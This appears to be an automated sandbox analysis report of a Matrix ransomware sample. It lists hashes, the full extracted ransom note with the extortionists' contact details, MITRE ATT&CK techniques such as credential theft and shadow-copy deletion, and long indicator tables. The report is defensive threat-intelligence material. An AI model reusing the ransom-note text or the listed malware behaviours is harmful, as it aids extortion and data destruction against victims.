matrix | 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95

Analysis

max time kernel
81s
max time network
82s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
22-09-2024 17:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MatrixRansomware.exe
Size

1.2MB
MD5

a93bd199d34d21cc9102600c6ce782cf
SHA1

31b50d84aa1af4f0e76a523382caba476f6e45dc
SHA256

242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95
SHA512

642e0cacf80a54ffa8f1bdeebb2a9b9449bb062bc331924ff8b6c93853ade68cdbd23928081d7c5da7bce944f5c553b0c4b05bd90fda525f017415bd891534c2
SSDEEP

24576:NykKxXJdZiDTrfJR5ez1888K0aNE1eXTBoAlK/u95ByxXEfui:N8bcLK+KzlK/udyh/i

Score

10^/10

matrix credential_access defense_evasion discovery evasion execution impact persistence ransomware spyware stealer upx

Malware Config

Extracted

Path

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Extensions\#README_EMAN#.rtf

Ransom Note

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected]\par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 27024E430F6CED0A\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 27024E430F6CED0A\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 WxBbddOs\cf0\f1\fs32\lang1049\par \par }

Emails

[email protected]\par

[email protected]\cf1\fs24\par

URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\rw\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\ProgramData\Package Cache\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}v64.8.8795\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nl\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pt-BR\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\uk\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\78CFJAW0\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\zh_TW\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jre-1.8\lib\security\policy\limited\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\cache\index-dir\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\it-IT\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\All Users\Microsoft\Diagnosis\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Google\Update\Install\{80279D00-E918-45B7-8FD9-5E902C3B5EF2}\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk-1.8\legal\jdk\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Mozilla Firefox\defaults\pref\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-786284298-625481688-3210388970-1000\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5r4i2p4s.default-release\storage\permanent\chrome\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tn-ZA\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Mozilla Firefox\fonts\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ca-Es-VALENCIA\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\cs\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pt-PT\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ur\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\ms\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ko\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ta\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Settings\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\or_IN\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en-GB\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\Settings\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kok\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\hrtfs\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\my\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ku-Arab\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ko\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\Settings\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280810\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\pa\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\BHO\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ml-IN\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\eu\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\pl\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\kn\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\Pictures\Camera Roll\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Public\Pictures\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\ProgramData\Package Cache\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}v12.0.40660\packages\vcRuntimeMinimum_x86\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\pt_BR\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\es_MX\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
5648	bcdedit.exe
5972	bcdedit.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	SjGmrQ0e64.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	SjGmrQ0e64.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	wscript.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Executes dropped EXE 64 IoCs

pid	Process
932	NWqlAD4G.exe
5884	SjGmrQ0e.exe
5936	SjGmrQ0e64.exe
7000	SjGmrQ0e.exe
7472	SjGmrQ0e.exe
6564	SjGmrQ0e.exe
1632	SjGmrQ0e.exe
6888	SjGmrQ0e.exe
2188	SjGmrQ0e.exe
5764	SjGmrQ0e.exe
5932	SjGmrQ0e.exe
4916	SjGmrQ0e.exe
3696	SjGmrQ0e.exe
1964	SjGmrQ0e.exe
1656	SjGmrQ0e.exe
640	SjGmrQ0e.exe
7020	SjGmrQ0e.exe
6184	SjGmrQ0e.exe
7088	SjGmrQ0e.exe
6640	SjGmrQ0e.exe
5372	SjGmrQ0e.exe
7856	SjGmrQ0e.exe
5324	SjGmrQ0e.exe
7108	SjGmrQ0e.exe
6820	SjGmrQ0e.exe
1008	SjGmrQ0e.exe
7160	SjGmrQ0e.exe
7328	SjGmrQ0e.exe
7304	SjGmrQ0e.exe
7396	SjGmrQ0e.exe
4684	SjGmrQ0e.exe
6768	SjGmrQ0e.exe
7232	SjGmrQ0e.exe
4580	SjGmrQ0e.exe
7240	SjGmrQ0e.exe
7872	SjGmrQ0e.exe
2488	SjGmrQ0e.exe
7692	SjGmrQ0e.exe
7716	SjGmrQ0e.exe
8104	SjGmrQ0e.exe
8036	SjGmrQ0e.exe
216	SjGmrQ0e.exe
5132	SjGmrQ0e.exe
5976	SjGmrQ0e.exe
1856	SjGmrQ0e.exe
5208	SjGmrQ0e.exe
5332	SjGmrQ0e.exe
5468	SjGmrQ0e.exe
6556	SjGmrQ0e.exe
6580	SjGmrQ0e.exe
2900	SjGmrQ0e.exe
7800	SjGmrQ0e.exe
5800	SjGmrQ0e.exe
6828	SjGmrQ0e.exe
3784	SjGmrQ0e.exe
1652	SjGmrQ0e.exe
6096	SjGmrQ0e.exe
1976	SjGmrQ0e.exe
1500	SjGmrQ0e.exe
3256	SjGmrQ0e.exe
3560	SjGmrQ0e.exe
6172	SjGmrQ0e.exe
4940	SjGmrQ0e.exe
5560	SjGmrQ0e.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
6680	takeown.exe
7184	takeown.exe
4832	takeown.exe
6804	takeown.exe
1600	takeown.exe
6108	takeown.exe
7820	takeown.exe
7452	takeown.exe
5028	Process not Found
6860	takeown.exe
7976	takeown.exe
668	takeown.exe
7272	takeown.exe
2688	Process not Found
292	takeown.exe
4604	takeown.exe
6876	Process not Found
7252	takeown.exe
5384	takeown.exe
6600	takeown.exe
4868	takeown.exe
6504	takeown.exe
5360	takeown.exe
7284	takeown.exe
3564	takeown.exe
6644	Process not Found
1628	Process not Found
4952	Process not Found
6196	takeown.exe
3420	takeown.exe
2036	takeown.exe
2368	takeown.exe
5692	takeown.exe
7432	takeown.exe
5068	takeown.exe
2652	takeown.exe
3256	takeown.exe
7796	takeown.exe
4040	takeown.exe
6180	takeown.exe
4440	takeown.exe
4364	takeown.exe
6096	takeown.exe
3464	takeown.exe
6384	Process not Found
5444	takeown.exe
5148	Process not Found
2036	takeown.exe
5820	Process not Found
7040	takeown.exe
6100	takeown.exe
7048	takeown.exe
1976	takeown.exe
212	takeown.exe
7152	takeown.exe
5876	takeown.exe
8100	Process not Found
5480	Process not Found
5860	takeown.exe
6416	takeown.exe
5976	takeown.exe
7116	takeown.exe
1084	Process not Found
5680	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023475-4911.dat	upx
behavioral2/memory/5884-4912-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/7472-6107-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/7000-6057-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/6564-6666-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/1632-6671-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/6888-6674-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/2188-6677-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/5764-6679-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/5764-6681-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/5932-6684-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/5884-6686-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/4916-6688-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/3696-6691-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/1964-6695-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/1656-6698-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/640-6701-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/7020-6703-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/6184-6706-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/7088-6709-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/6640-6712-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/5372-6715-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/7856-6717-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/5324-6719-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/7108-6724-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/6820-6726-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/1008-6728-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/7160-6731-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/7328-6734-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/7304-6736-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/7396-6738-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/4684-6741-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/6768-6743-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/7232-6746-0x0000000000400000-0x0000000000477000-memory.dmp	upx
